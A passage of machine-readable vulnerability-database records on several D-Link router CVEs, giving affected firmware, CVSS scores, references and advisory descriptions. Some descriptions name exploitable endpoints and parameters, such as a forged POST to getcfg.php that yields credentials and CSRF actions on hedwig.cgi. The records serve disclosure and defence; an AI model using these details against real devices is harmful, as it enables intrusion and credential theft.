"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"cve": "CVE-2023-5144",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5144",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2023-5144",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected is an unknown function of the file /sysmanage/updateos.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240240. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
},
{
"db": "VULMON",
"id": "CVE-2023-5144"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "VULDB",
"id": "240240",
"trust": 1.1
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.1
},
{
"db": "NVD",
"id": "CVE-2023-5144",
"trust": 1.1
},
{
"db": "VULMON",
"id": "CVE-2023-5144",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"id": "VAR-202309-0932",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-05T23:11:00.930000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.1,
"url": "https://vuldb.com/?id.240240"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.240240"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-7000_upload_%20changelogo.md"
},
{
"trust": 1.1,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-8000-10_upload_%20updateos.md"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-24T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"date": "2023-09-24T23:15:10.587000",
"db": "NVD",
"id": "CVE-2023-5144"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5144"
},
{
"date": "2024-06-04T19:18:09.637000",
"db": "NVD",
"id": "CVE-2023-5144"
}
]
}
}
VAR-202109-1682
Vulnerability from variot - Updated: 2024-06-02 22:59An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version : 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page. D-LINK-DIR-605 An incorrect authentication vulnerability exists in firmware.Information may be obtained. D-Link DIR-605L is the first cloud router launched by D-link, with a transmission speed of 300Mpbs.
D-Link DIR-605L has an information disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-1682",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-605l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.01mt"
},
{
"model": "dir-605l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-605l firmware 2.01mt"
},
{
"model": "dir-605l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-605l b2 2.01mt",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-605l:b2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"cve": "CVE-2021-40655",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-40655",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-94835",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-40655",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-40655",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-94835",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1689",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-40655",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version : 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page. D-LINK-DIR-605 An incorrect authentication vulnerability exists in firmware.Information may be obtained. D-Link DIR-605L is the first cloud router launched by D-link, with a transmission speed of 300Mpbs. \n\r\n\r\nD-Link DIR-605L has an information disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-40655",
"trust": 3.9
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-94835",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-40655",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"id": "VAR-202109-1682",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
}
],
"trust": 1.3767857000000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
}
]
},
"last_update_date": "2024-06-02T22:59:43.800000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DIR-605L Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/302906"
},
{
"title": "D-link Dir-605 B2 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164769"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Illegal authentication (CWE-863) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/ilovewomen/d-link-dir-605/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40655"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/522.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"date": "2021-09-24T00:00:00",
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"date": "2021-09-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"date": "2021-09-24T21:15:07.310000",
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94835"
},
{
"date": "2021-09-30T00:00:00",
"db": "VULMON",
"id": "CVE-2021-40655"
},
{
"date": "2024-05-31T06:45:00",
"db": "JVNDB",
"id": "JVNDB-2021-012445"
},
{
"date": "2022-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1689"
},
{
"date": "2024-05-18T01:00:01.417000",
"db": "NVD",
"id": "CVE-2021-40655"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-LINK-DIR-605\u00a0 Fraudulent Authentication Vulnerability in Firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012445"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1689"
}
],
"trust": 0.6
}
}
VAR-201501-0347
Vulnerability from variot - Updated: 2024-06-02 22:46Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php. D-Link DIR-600 router (rev. (2) hedwig.cgi Remote administration can be enabled via a crafted configuration module. The D-Link DIR-600 is a wireless routing device. Because the program allows users to perform certain operations through unauthenticated HTTP requests, an attacker can exploit the vulnerability to modify the configuration when a logged-in administrative user accesses a specially crafted web page. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. D-Link DIR-600 is a SOHO wireless router product of D-Link
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0347",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-600",
"scope": null,
"trust": 1.4,
"vendor": "d link",
"version": null
},
{
"model": "dir-600",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-600",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.16ww"
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "firmware 2.17b02"
},
{
"model": "dir-600",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.16ww"
},
{
"model": "dir-600 2.16ww",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01581"
},
{
"db": "BID",
"id": "66092"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007601"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
},
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-600_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.16ww",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-600:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-100005"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dawid Czagan",
"sources": [
{
"db": "BID",
"id": "66092"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-571"
}
],
"trust": 0.9
},
"cve": "CVE-2014-100005",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-100005",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
